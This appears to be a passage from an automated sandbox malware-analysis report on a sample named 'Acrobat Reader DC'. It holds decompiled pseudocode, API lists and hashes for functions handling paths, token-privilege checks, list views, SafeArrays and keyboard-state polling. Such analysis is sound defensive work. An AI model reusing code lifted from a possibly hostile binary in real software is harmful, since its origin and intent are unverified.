                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                  • String ID:
                                  • API String ID: 3490752873-0
                                  • Opcode ID: 47742338c970596221c3926e6b4b4bf415b8072ff702eac902e9f585fe699a5a
                                  • Instruction ID: 246472a61925077f0ce062fd926fe76963597eff5ae69a3ad94d9fcadac7f974
                                  • Opcode Fuzzy Hash: 47742338c970596221c3926e6b4b4bf415b8072ff702eac902e9f585fe699a5a
                                  • Instruction Fuzzy Hash: FD51C0B1900209ABEB10DFA5DC84EEFB778AF49704F04C41EF515A7241D7B8E905CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00433784(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v526;
				char _v528;
				char _v1052;
				char _v1574;
				char _v1576;
				char _v2100;
				char _v2624;
				char _v3148;
				char _v3672;
				char _v4196;
				void* __edi;
				void* __esi;
				void* _t38;
				char* _t53;
				void* _t61;
				intOrPtr _t81;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;

				_t61 = __ebx;
				E00422240(0x1060);
				_t82 = _a16;
				_t81 = _a20;
				_t38 = E00413E1F(_a16, 0x2a);
				_t85 = _t84 + 8;
				if(_t38 != 0) {
					E00413A0E(_a4,  &_v2100,  &_v3148,  &_v4196,  &_v528);
					E00413A0E(_t82,  &_v2100,  &_v3148,  &_v3672,  &_v1576);
					_t86 = _t85 + 0x28;
					if(_v528 == 0x2e) {
						E00411567( &_v528,  &_v526);
						_t86 = _t86 + 8;
					}
					if(_v1576 == 0x2e) {
						E00411567( &_v1576,  &_v1574);
						_t86 = _t86 + 8;
					}
					E00411567(_t81,  &_v2100);
					E00411536(_t81,  &_v3148);
					E004336C5(_t61,  &_v1576, _t81, 0x2e,  &_v528, _a12,  &_v1576,  &_v2624);
					E004336C5(_t61,  &_v4196, _t81, 0x2e,  &_v4196, _a8,  &_v3672,  &_v1052);
					_t87 = _t86 + 0x30;
					if(_v2624 == 0) {
						if(_v528 != 0) {
							E00411536( &_v1052, ".");
							_t53 =  &_v528;
							goto L10;
						}
					} else {
						E00411536( &_v1052, ".");
						_t53 =  &_v2624;
						L10:
						E00411536( &_v1052, _t53);
						_t87 = _t87 + 0x10;
					}
					return E00411536(_t81,  &_v1052);
				} else {
					return E00411567(_t81, _t82);
				}
			}























                                  0x00433784
                                  0x0043378c
                                  0x00433792
                                  0x00433796
                                  0x0043379c
                                  0x004337a1
                                  0x004337a6
                                  0x004337d8
                                  0x004337fa
                                  0x00433804
                                  0x0043380e
                                  0x0043381e
                                  0x00433823
                                  0x00433823
                                  0x0043382d
                                  0x0043383d
                                  0x00433842
                                  0x00433842
                                  0x0043384d
                                  0x0043385a
                                  0x00433878
                                  0x00433896
                                  0x0043389b
                                  0x004338a6
                                  0x004338c9
                                  0x004338d7
                                  0x004338dc
                                  0x00000000
                                  0x004338dc
                                  0x004338a8
                                  0x004338b4
                                  0x004338b9
                                  0x004338e2
                                  0x004338ea
                                  0x004338ef
                                  0x004338ef
                                  0x00433907
                                  0x004337a8
                                  0x004337b7
                                  0x004337b7

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                  • String ID:
                                  • API String ID: 136442275-0
                                  • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                  • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                  • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                  • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00436F47 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 111threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00436F47() {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				WCHAR* _v24;
				struct _LUID _v32;
				char _v36;
				struct _LUID _v44;
				void* _t32;
				void* _t39;
				void* _t41;
				intOrPtr _t45;
				intOrPtr* _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				void* _t58;
				void* _t59;

				_t54 = 0;
				_v8 = 0;
				_v12 = 0;
				_t45 = 0;
				_v20 = 0;
				if(OpenThreadToken(GetCurrentProcess(), 8, 0,  &_v8) != 0 || OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					if(E00436BC5(_v8,  &_v12,  &_v20) == 0 || LookupPrivilegeValueW(0, L"SeAssignPrimaryTokenPrivilege",  &_v44) == 0) {
						L17:
						_t54 = _v12;
					} else {
						_v36 = 0;
						if(LookupPrivilegeValueW(0, L"SeIncreaseQuotaPrivilege",  &_v32) == 0) {
							goto L17;
						} else {
							_v24 = 0;
							_t54 = _v12;
							_t58 = 0;
							if( *_t54 > 0) {
								_v12 = _t54 + 4;
								do {
									_t46 =  &_v36;
									_v16 = 2;
									do {
										_t41 = E004119E3(_v12, _t46 - 8, 8);
										_t59 = _t59 + 0xc;
										if(_t41 == 0) {
											 *_t46 = 1;
										}
										_t46 = _t46 + 0xc;
										_t20 =  &_v16;
										 *_t20 = _v16 - 1;
									} while ( *_t20 != 0);
									_v12 = _v12 + 0xc;
									_t58 = _t58 + 1;
								} while (_t58 <  *_t54);
							}
							_t45 = 1;
							_t39 = 0;
							_t48 =  &_v36;
							while( *_t48 != 0) {
								_t39 = _t39 + 1;
								_t48 = _t48 + 0xc;
								if(_t39 < 2) {
									continue;
								} else {
								}
								goto L18;
							}
							_t45 = 0;
						}
					}
				}
				L18:
				_t32 = _v8;
				if(_t32 != 0) {
					CloseHandle(_t32);
				}
				E00436BA9(_t54);
				return _t45;
			}




















                                  0x00436f56
                                  0x00436f5f
                                  0x00436f62
                                  0x00436f65
                                  0x00436f67
                                  0x00436f75
                                  0x00436fa1
                                  0x00437040
                                  0x00437040
                                  0x00436fc3
                                  0x00436fcd
                                  0x00436fd4
                                  0x00000000
                                  0x00436fd6
                                  0x00436fd6
                                  0x00436fd9
                                  0x00436fdc
                                  0x00436fe0
                                  0x00436fe5
                                  0x00436fe8
                                  0x00436fe8
                                  0x00436feb
                                  0x00436ff7
                                  0x00437001
                                  0x00437006
                                  0x00437010
                                  0x00437012
                                  0x00437012
                                  0x00437014
                                  0x00437017
                                  0x00437017
                                  0x00437017
                                  0x0043701c
                                  0x00437020
                                  0x00437021
                                  0x00436fe8
                                  0x00437025
                                  0x00437027
                                  0x00437029
                                  0x0043702c
                                  0x00437031
                                  0x00437032
                                  0x00437038
                                  0x00000000
                                  0x00000000
                                  0x0043703a
                                  0x00000000
                                  0x00437038
                                  0x0043703c
                                  0x0043703c
                                  0x00436fd4
                                  0x00436fa1
                                  0x00437043
                                  0x00437043
                                  0x00437048
                                  0x0043704b
                                  0x0043704b
                                  0x00437052
                                  0x00437062

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,?), ref: 00436F6A
                                  • OpenThreadToken.ADVAPI32(00000000), ref: 00436F6D
                                  • GetCurrentProcess.KERNEL32(00000008,?), ref: 00436F7D
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00436F80
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 00436FB9
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00436FD0
                                  • _memcmp.LIBCMT ref: 00437001
                                  • CloseHandle.KERNEL32(?), ref: 0043704B
                                  Strings
                                  • SeAssignPrimaryTokenPrivilege, xrefs: 00436FB1
                                  • SeIncreaseQuotaPrivilege, xrefs: 00436FC7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                  • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                  • API String ID: 1446985595-805462909
                                  • Opcode ID: 20e3785b7433241d37dd94a03bfa4397e83b78d22b2bbb476a85e96c63628419
                                  • Instruction ID: 5d9cc79d75c838d3750a3a1f44766322371bceb9368f6a60d1057fe533f678da
                                  • Opcode Fuzzy Hash: 20e3785b7433241d37dd94a03bfa4397e83b78d22b2bbb476a85e96c63628419
                                  • Instruction Fuzzy Hash: 6531BEB2D40209ABDF20DBA1CD44AEFBBB8FB88310F14545BE940A7240D7789A45CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448123 Relevance: 16.7, APIs: 11, Instructions: 187windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00448123(void* __eflags, intOrPtr _a4, signed short _a8, char _a12, signed int _a16) {
				int _v8;
				signed char _v12;
				intOrPtr _v16;
				long _v20;
				signed short _v28;
				intOrPtr _v32;
				long _v40;
				long _v52;
				long _v56;
				void* _v60;
				void* _v8252;
				intOrPtr _t79;
				long _t81;
				long _t85;
				long _t89;
				intOrPtr _t92;
				long _t95;
				signed short _t99;
				long _t101;
				signed int _t105;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				intOrPtr _t114;
				intOrPtr _t116;
				signed short _t121;
				intOrPtr _t129;
				intOrPtr _t135;
				struct HWND__* _t140;

				E00422240(0x203c);
				if(E00441AF5(0x4a8630, _a16,  &_a16,  &_v8) == 0) {
					L15:
					__eflags = 0;
					return 0;
				} else {
					_t107 =  *0x4a8690; // 0x0
					_t108 =  *0x4a86a4; // 0xa51ad0
					_t105 = _v8;
					_v16 =  *((intOrPtr*)( *((intOrPtr*)(_t107 + _a16 * 4))));
					_t140 =  *( *( *(_t108 + _t105 * 4)));
					_t79 = _a4;
					 *(_t79 + 0x30) = _t140;
					_t109 =  *0x4a86a4; // 0xa51ad0
					 *((char*)(_t79 + 0x8b)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + _t105 * 4)))) + 0x8b));
					_t81 = SendMessageW(SendMessageW(_t140, 0x101f, 0, 0), 0x1200, 0, 0);
					 *(_a4 + 0x8c) = _t81;
					_t129 =  *0x4a86a4; // 0xa51ad0
					_v20 = _t81;
					 *( *((intOrPtr*)( *((intOrPtr*)(_t129 + _t105 * 4)))) + 0x8c) = _t81;
					_v12 = GetWindowLongW(_t140, 0xfffffff0);
					E00412F40( &_v60, 0, 0x28);
					_t85 = SendMessageW(_t140, 0x1004, 0, 0);
					 *(_a4 + 0x80) = _t85;
					_t114 =  *0x4a86a4; // 0xa51ad0
					_v60 = 7;
					_v32 = 0xfffffffe;
					_t116 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + _t105 * 4)))) + 0x94));
					_a16 = 1;
					_t145 = _t116 - 0xffffffff;
					if(_t116 > 0xffffffff) {
						_v32 = _t116;
					}
					_v56 = _t85;
					_v40 =  &_v8252;
					_v28 = _a8;
					_v52 = 0;
					E00430626(_t145,  &_v8252,  &_a12, 0x4a8644);
					_t89 = SendMessageW(_t140, 0x104d, 0,  &_v60);
					_v8 = _t89;
					_t146 = _t89 - 0xffffffff;
					if(_t89 == 0xffffffff) {
						goto L15;
					} else {
						while(E00430626(_t146,  &_v8252,  &_a12, 0x4a8644) != 0) {
							_t95 = _a16;
							_v52 = _t95;
							if(_t95 > _v20) {
								SendMessageW(_t140, 0x1008, _v8,  &_v60);
								goto L15;
							} else {
								if(_v8252 == 0 || SendMessageW(_t140, 0x1074, _v8,  &_v60) != 0) {
									if((_v12 & 0x00000001) != 0) {
										_t99 = SendMessageW(_t140, 0x1057, 0,  &_v8252) + 0xc;
										_a8 = _t99;
										if(_t99 > 0x96) {
											_a8 = 0x96;
										}
										_t101 = SendMessageW(_t140, 0x101d, _a16, 0);
										_t121 = _a8;
										_t146 = _t101 - _t121;
										if(_t101 <= _t121) {
											SendMessageW(_t140, 0x101e, _a16, _t121 & 0x0000ffff);
										}
									}
									_a16 = _a16 + 1;
									continue;
								} else {
									goto L15;
								}
							}
							goto L19;
						}
						_t135 = _a4;
						__eflags =  *((char*)(_t135 + 0x8b)) - 0xff;
						if( *((char*)(_t135 + 0x8b)) != 0xff) {
							_t92 =  *0x4a86a4; // 0xa51ad0
							E00430B87(_v16,  *((intOrPtr*)( *((intOrPtr*)(_t92 + _t105 * 4)))), 1);
						}
						return 1;
					}
				}
				L19:
			}
































                                  0x0044812b
                                  0x0044814b
                                  0x00448322
                                  0x00448322
                                  0x0044832a
                                  0x00448151
                                  0x00448151
                                  0x0044815f
                                  0x00448165
                                  0x00448173
                                  0x00448178
                                  0x0044817a
                                  0x0044817f
                                  0x00448182
                                  0x004481a2
                                  0x004481ab
                                  0x004481b0
                                  0x004481b7
                                  0x004481c5
                                  0x004481c8
                                  0x004481d7
                                  0x004481e0
                                  0x004481f2
                                  0x004481fa
                                  0x00448201
                                  0x00448207
                                  0x0044820e
                                  0x0044821d
                                  0x00448223
                                  0x0044822a
                                  0x0044822d
                                  0x0044822f
                                  0x0044822f
                                  0x00448240
                                  0x00448248
                                  0x0044824b
                                  0x0044824e
                                  0x00448255
                                  0x00448266
                                  0x00448268
                                  0x0044826b
                                  0x0044826e
                                  0x00000000
                                  0x00448274
                                  0x00448274
                                  0x00448291
                                  0x00448294
                                  0x0044829a
                                  0x00448320
                                  0x00000000
                                  0x0044829c
                                  0x004482a4
                                  0x004482be
                                  0x004482d1
                                  0x004482d4
                                  0x004482dc
                                  0x004482de
                                  0x004482de
                                  0x004482f1
                                  0x004482f3
                                  0x004482f6
                                  0x004482f8
                                  0x00448308
                                  0x00448308
                                  0x004482f8
                                  0x0044830a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004482a4
                                  0x00000000
                                  0x0044829a
                                  0x0044832d
                                  0x00448330
                                  0x00448337
                                  0x00448339
                                  0x0044834a
                                  0x0044834a
                                  0x00448357
                                  0x00448357
                                  0x0044826e
                                  0x00000000

                                  APIs
                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                  • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                  • _memset.LIBCMT ref: 004481E0
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                  • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                  • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                  • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                  • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow_memset
                                  • String ID:
                                  • API String ID: 830647256-0
                                  • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                  • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                  • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                  • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00479362(void* __eflags, void* __fp0, char _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t58;
				intOrPtr _t61;
				char* _t62;
				signed int _t94;
				void* _t102;
				void* _t103;
				intOrPtr _t104;
				signed int _t108;
				signed int _t111;
				void* _t112;
				void* _t123;

				_t123 = __fp0;
				_t58 = E004323E1( &_a4, 0);
				_t102 = _t58;
				__imp__#41(0xc, _t102,  &_v8);
				if(_t58 < 0) {
					L13:
					E00408F40(_t102,  &_a4);
					return 0;
				} else {
					_t94 = 0;
					if(_t102 > 0) {
						do {
							_t4 = _t94 + 1; // 0x1
							_t111 = _t4;
							 *((intOrPtr*)(_v8 + 0x14 + _t94 * 8)) = 0;
							 *((intOrPtr*)(_v8 + 0x10 + _t94 * 8)) = E004323E1( &_a4, _t111);
							_t94 = _t111;
						} while (_t94 < _t102);
					}
					_t61 = _v8;
					 *((short*)(_t61 + 2)) = 0x880;
					 *((intOrPtr*)(_v8 + 4)) = 0x10;
					__imp__#37(_v8);
					if(_t61 < 0) {
						__imp__#38(_v8);
						goto L13;
					} else {
						_t62 =  &_v36;
						__imp__#8(_t62);
						_v28 = 0;
						_v24 = 0;
						_v52 = 0;
						_v44 = 1;
						_v40 = 0;
						__imp__#23(_v8,  &_v16);
						if(_t62 < 0) {
							__imp__#39(_v8);
							__imp__#38(_v8);
							E00408F40(_t102,  &_v52);
							__imp__#9( &_v36);
							E00408F40(_t102,  &_a4);
							return 0;
						} else {
							_v12 = _v16;
							E00408E80( &_v52,  &_a4,  &_a4);
							_t103 = E00479230( &_a4,  &_v52,  &_v20);
							_t108 = 0;
							if(_t103 > 0) {
								_t91 = _v12;
								do {
									_t75 = _v20;
									if( *((intOrPtr*)(_v20 + _t108 * 4)) != 0) {
										_t112 = _t112 - 0x10;
										E0040B960( *((intOrPtr*)(_t75 + _t108 * 4)), _t112, _t91, _t103);
										E00470E55(_t91, _t103, _t123);
										_t91 = _v12;
										__imp__#10(_v12,  &_v36,  &_v36);
									}
									_v12 = _v12 + 0x10;
									_t108 = _t108 + 1;
								} while (_t108 < _t103);
							}
							__imp__#24(_v8);
							_t104 = _v8;
							E00408F40(_t104,  &_v52);
							__imp__#9( &_v36);
							_v28 = 0;
							_v24 = 0;
							E00408F40(_t104,  &_a4);
							return _t104;
						}
					}
				}
			}



























                                  0x00479362
                                  0x00479372
                                  0x0047937b
                                  0x00479380
                                  0x00479388
                                  0x004794ed
                                  0x004794f0
                                  0x004794fd
                                  0x0047938e
                                  0x0047938e
                                  0x00479392
                                  0x00479394
                                  0x00479397
                                  0x00479397
                                  0x0047939f
                                  0x004793ab
                                  0x004793af
                                  0x004793b1
                                  0x00479394
                                  0x004793b5
                                  0x004793bd
                                  0x004793c4
                                  0x004793cf
                                  0x004793d7
                                  0x004794e7
                                  0x00000000
                                  0x004793dd
                                  0x004793dd
                                  0x004793e1
                                  0x004793ef
                                  0x004793f2
                                  0x004793f5
                                  0x004793f8
                                  0x004793ff
                                  0x00479402
                                  0x0047940a
                                  0x004794ae
                                  0x004794b8
                                  0x004794c1
                                  0x004794ca
                                  0x004794d3
                                  0x004794e0
                                  0x00479410
                                  0x0047941a
                                  0x0047941d
                                  0x0047942c
                                  0x0047942e
                                  0x00479432
                                  0x00479434
                                  0x0047943a
                                  0x0047943a
                                  0x00479441
                                  0x00479446
                                  0x0047944b
                                  0x00479454
                                  0x00479459
                                  0x00479461
                                  0x00479461
                                  0x00479467
                                  0x0047946b
                                  0x0047946c
                                  0x0047943a
                                  0x00479474
                                  0x0047947a
                                  0x00479480
                                  0x00479489
                                  0x00479494
                                  0x00479497
                                  0x0047949a
                                  0x004794a7
                                  0x004794a7
                                  0x0047940a
                                  0x004793d7

                                  APIs
                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                  • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                  • VariantInit.OLEAUT32(?), ref: 004793E1
                                  • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                  • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                  • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                  • VariantClear.OLEAUT32(?), ref: 00479489
                                  • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                  • VariantClear.OLEAUT32(?), ref: 004794CA
                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                  • String ID:
                                  • API String ID: 2706829360-0
                                  • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                  • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                  • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                  • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004447E0(intOrPtr _a4, char* _a8) {
				intOrPtr _v99;
				intOrPtr _v100;
				intOrPtr _v169;
				intOrPtr _v242;
				intOrPtr _v243;
				intOrPtr _v244;
				char _v260;
				char* _t55;
				intOrPtr _t78;
				char* _t79;

				_t79 = _a8;
				_t78 = _a4;
				 *_t79 = 0;
				 *((short*)(_t79 + 4)) = 0;
				if( *((intOrPtr*)(_t78 + 0x20)) == 0) {
					if((0x00008000 & GetAsyncKeyState(0xa0)) != 0 || (0x00008000 & GetKeyState(0xa0)) != 0) {
						if( *((char*)(_t78 + 0x1a)) == 0) {
							 *_t79 = 1;
						}
					}
					if((0x00008000 & GetAsyncKeyState(0xa1)) != 0 || (0x00008000 & GetKeyState(0xa1)) != 0) {
						if( *((char*)(_t78 + 0x1b)) == 0) {
							 *((char*)(_t79 + 1)) = 1;
						}
					}
					if((0x00008000 & GetAsyncKeyState(0x11)) != 0 || (0x00008000 & GetKeyState(0x11)) != 0) {
						if( *((char*)(_t78 + 0x1c)) == 0) {
							 *((char*)(_t79 + 2)) = 1;
						}
					}
					if((0x00008000 & GetAsyncKeyState(0x12)) != 0 || (0x00008000 & GetKeyState(0x12)) != 0) {
						if( *((char*)(_t78 + 0x1d)) == 0) {
							 *((char*)(_t79 + 3)) = 1;
						}
					}
					if((0x00008000 & GetAsyncKeyState(0x5b)) != 0 || (0x00008000 & GetKeyState(0x5b)) != 0) {
						_t55 = _t79;
						if( *((char*)(_t78 + 0x1e)) == 0) {
							 *((char*)(_t79 + 4)) = 1;
							return _t55;
						}
						goto L39;
					} else {
						goto L18;
					}
				} else {
					if(GetKeyboardState( &_v260) == 0) {
						L18:
						return _t79;
					} else {
						if(_v100 == 0x80 || _v244 == 0x80) {
							if( *((char*)(_t78 + 0x1a)) == 0) {
								 *_t79 = 1;
							}
						}
						if(_v99 == 0x80 &&  *((char*)(_t78 + 0x1b)) == 0) {
							 *((char*)(_t79 + 1)) = 1;
						}
						if(_v243 == 0x80 &&  *((char*)(_t78 + 0x1c)) == 0) {
							 *((char*)(_t79 + 2)) = 1;
						}
						if(_v242 == 0x80 &&  *((char*)(_t78 + 0x1d)) == 0) {
							 *((char*)(_t79 + 3)) = 1;
						}
						if(_v169 != 0x80) {
							goto L18;
						} else {
							_t55 = _t79;
							if( *((char*)(_t78 + 0x1e)) != 0) {
								L39:
								return _t55;
							} else {
								 *((char*)(_t79 + 4)) = 1;
								return _t55;
							}
						}
					}
				}
			}













                                  0x004447ea
                                  0x004447ee
                                  0x004447f5
                                  0x004447fb
                                  0x00444801
                                  0x004448a3
                                  0x004448be
                                  0x004448c0
                                  0x004448c0
                                  0x004448be
                                  0x004448d2
                                  0x004448ed
                                  0x004448ef
                                  0x004448ef
                                  0x004448ed
                                  0x004448ff
                                  0x00444917
                                  0x00444919
                                  0x00444919
                                  0x00444917
                                  0x00444929
                                  0x00444941
                                  0x00444943
                                  0x00444943
                                  0x00444941
                                  0x00444954
                                  0x00444970
                                  0x00444972
                                  0x00444974
                                  0x00000000
                                  0x00444974
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00444807
                                  0x00444816
                                  0x00444884
                                  0x0044488a
                                  0x00444818
                                  0x0044481d
                                  0x0044482b
                                  0x0044482d
                                  0x0044482d
                                  0x0044482b
                                  0x00444833
                                  0x0044483b
                                  0x0044483b
                                  0x00444845
                                  0x0044484d
                                  0x0044484d
                                  0x00444857
                                  0x0044485f
                                  0x0044485f
                                  0x00444869
                                  0x00000000
                                  0x0044486b
                                  0x0044486f
                                  0x00444871
                                  0x0044497d
                                  0x0044497d
                                  0x00444878
                                  0x00444878
                                  0x00444880
                                  0x00444880
                                  0x00444871
                                  0x00444869
                                  0x00444816

                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044480E
                                  • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                  • GetKeyState.USER32(000000A0), ref: 004448AA
                                  • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                  • GetKeyState.USER32(000000A1), ref: 004448D9
                                  • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                  • GetKeyState.USER32(00000011), ref: 00444903
                                  • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                  • GetKeyState.USER32(00000012), ref: 0044492D
